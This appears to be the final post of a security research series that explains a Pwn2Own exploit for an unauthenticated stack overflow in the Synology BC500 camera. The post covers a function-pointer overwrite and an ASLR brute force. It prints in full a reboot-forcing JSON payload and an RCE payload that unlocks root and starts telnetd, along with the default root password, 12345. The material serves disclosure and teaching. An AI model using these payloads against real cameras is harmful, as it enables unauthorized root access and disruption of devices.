If you have not read the previous blog posts I recommend you to have a look at part 1, where we discuss how to extract the firmware from the camera, part 2 where we enumerate the attack surface, and part 3 where we discuss how we discovered the vulnerability and part 4 where we analyze the memory corruption.

In this final part of this series, we are finally going to explain how the stack-based buffer overflow vulnerability can be exploited to gain unauthenticated remote code execution (RCE) on the Synology BC500 camera.

PC Control

Recall from part Part IV that overflowing the stack with a ROP payload is tedious, as only UTF-8 characters are accepted by the library and null bytes are rejected. We therefore started looking for other ways to gain control over the program counter (PC). To this end, we started looking for interesting data structures on the stack that we can overflow.

After some reverse engineering, we noticed an interesting struct on the stack: lex_t. The definition of this struct can be found in the source code of the jansson library:

As the name suggests, lex_t is used by the lexer for tokenizing the JSON input. The following observations are important for the exploit:

  • The first field in the struct lex_t is of type struct stream_t.
  • The first field in the struct stream_t is a function pointer.
  • As described in the comment on line 49, this function pointer is used to fetch the next character from the user input.

When overflowing the stack, the function pointer is the first field in the struct that is overflown. Therefore, we can override the function pointer while leaving the remaining struct intact. The remainder of this section shows where and how the function pointer is invoked by libjansson.

After overflowing the stack on line 34 (see part 4), the function lex_scan (line 41) is invoked:

Note that the first argument lex is a pointer to the lex_t struct. The function lex_scan invokes ZNSt3mapItPN3com4sony7imaging6remote24SDIDevicePropInfoDatasetESt4lessItESaISt4pairIKtS5_EEE4findERS9_:

This function (at address 0x0000581C) invokes sub_5418 (at address 0x00005418):

In sub_5418, after checking if the error flag is set, the function pointer is finally invoked with the first argument pointing to our input:

(Note: The field input in the decompiled code is actually called data in the source code.)

The details of the function pointer invocation can be seen more clearly in the disassembly:

The idea of the exploit is now to overflow the function pointer with the address of libc’s system function. On function pointer invocation, the system function is invoked on our attacker-controlled input, allowing us to execute arbitrary commands on the system. The remaining issue is that the address of system is not static as the system is configured with ASLR. This is addressed in the next section.

It is worth emphasizing that actual exploit is not invoking libc’s system function but rather a sub-function of system that we shall refer to as system_impl. The function works exactly as system, except that a NULL check is omitted:

The rationale behind this technicality is provided in the next section.

ASLR Bypass

Recall that 8-bit ASLR is configured on the camera’s operating system. For instance, in the address 0xABCDEFGH, the two hex digits D and E are chosen uniformly at random for each invocation of synocam_param.cgi. Each request is processed in a new process. Therefore, for each fork a fresh random ASLR offset is chosen independently of previous forks. This allows to arbitrarily choose D and E for the address that points to system_impl (which must be Unicode encodable) since these values will be sampled eventually. This is important as it allows us to encode the address in Unicode without any null bytes.

The system_impl function in libc was determined to be mapped to 0x768XYb34 where X and Y are chosen uniformly at random. In our payload, the address was fixed as 0x7683db34, which can be encoded in Unicode as \u0034\u06c3v (little-endian byte order). The probability that this address works at least once after n tries is given by 1-(1-p)^n where p=1/256. This gives a 98% success probability after sending 1000 requests to the camera, and a >99% success probability after roughly 1200 requests.

The Pwn2Own rules state that an attack must complete within 10 minutes, and the participants are given three attempts. It was empirically determined that our attack is successful with an above 99% probability. However, there is one complication that can occur when the provided address of system_impl is not correct. In most instances, the synocam_param.cgi process simply crashes, which is not an issue as the webd daemon that forked the process is not affected (i.e., neither the web server nor the camera reboots). However, there are rare cases where the jump to an invalid / unexpected addresses causes the process to hang (e.g., it is waiting for input or spinning in an infinite loop). If too many processes hang, the camera can process fewer requests, thereby significantly slowing down the exploit. While testing the exploit, we encountered cases where the attack did not complete or just barely completed within 10 minutes – an unacceptable risk.

To prevent this, the final exploit uses the following strategy: if the exploit detects a sufficiently high number of hanging processes, it sends a specific payload that forces a camera reboot. After the camera has rebooted, the exploit automatically resumes the attack. With this approach, the exploit completed within 10 minutes in all our trial runs (often it just takes a couple seconds). The payload that causes a forced camera reboot is described in the section below.

Payloads

Recall that the buffer overflow can be triggered by invoking an (unauthenticated) JSON endpoint of the camera’s web interface. This section describes the two payloads that were used in the exploit (camera reboot and RCE payload).

Camera Reboot Payload

It was found that when sending a JSON object with a key of length exactly 185 characters, the process that handles the request hangs:

{"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", "burp_is_not_b33f"}

The webd daemon has a pool of 10 threads for processing requests. If all of them hang, this is detected by a watchdog process who will then kill the webd daemon and reboot the camera. Therefore, a camera reboot can be forced by sending 10 requests containing the payload above.

RCE Payload

The RCE payload is sent as a JSON key. The payload contains two bash commands that will be executed when the payload is triggered, as well as the address of system_impl (in Unicode format):

{"aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaafaabgaabhaabiaabjaabkaablaa;passwd${IFS}-u${IFS}root;telnetd;CCCC\u0034\u06c3v";"")

Note that including spaces in the payload leads to some complications; the most straightforward solution was to replace spaces with the ${IFS} bash variable.

To ensure that the function pointer is invoked on our input, the stack needs to be aligned correctly. It turns out that HTTP headers are sent to the synoparam.cgi binary through environment variables that are stored on the stack. Therefore, the stack can be aligned by adding custom headers:

Dummy: ayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaab
Content-Type: application/json

The first header ensures that the stack is aligned correctly while the second one sets the content type:

If the ASLR offset is correct, the payload above executes two commands (as root):

  • Enable the root user.
  • Start a telnet daemon that then allows to log in as the root user.

Once the payload has successfully executed, the attacker can log in via telnet with root / 12345. (By default, the root user is locked but a password is pre-configured. This password (12345) was cracked with an offline brute-force attack against the password hash stored in /etc/passwd.)

The following image shows the shell access after the payload has successfully executed:

Pwn2Own Competition

Finally, on October 23rd it was time for two of our teammates to fly out to Toronto to demonstrate the exploit against the BC500 camera in the ZDI office.

In Pwn2Own, the first team to successfully demonstrate the exploit will receive the full payout, while subsequent teams targeting the same device with the same bug will receive a reduced amount. The draw to determine the schedule happened during the flight, which we could follow thanks to inflight Wi-Fi. Unfortunately for us, we would be the 3rd team to demonstrate our exploit against the Synology BC500 camera.

Additionally, while in the air the teammates back home discovered that a small update to the firmware was just released by Synology. As we could not analyze the update on the airplane, the fear that the bugchain could have been patched started to grow. Luckily, after a long few minutes, the teammates at home confirmed that the exploit still works against the latest firmware.

Note: While the release notes only mention “Minor bug fixes.”, the updated firmware version actually patched multiple vulnerabilities, including the authenticated command injections we described in part 2 of this blog series.

The next day it was time to demonstrate the exploit. Up to three attempts within a 30 minute time window were allowed. We were confident that the exploit should succeed, but as an ASLR brute-force was required we still were a little nervous. Fortunately, the exploit succeeded after only a few seconds! The first successful attempt at Pwn2Own from Compass Security was confirmed.

Afterwards it was time to discuss the bug and exploit with the ZDI team. The same bug had unfortunately already been used by another team before us, thus our payout was reduced from 30,000$ to 3,750$.

Nevertheless, it was an amazing (albeit sometimes frustrating) journey with many learnings! We hope to be back at Pwn2Own in 2024.

All the parts of this blog post: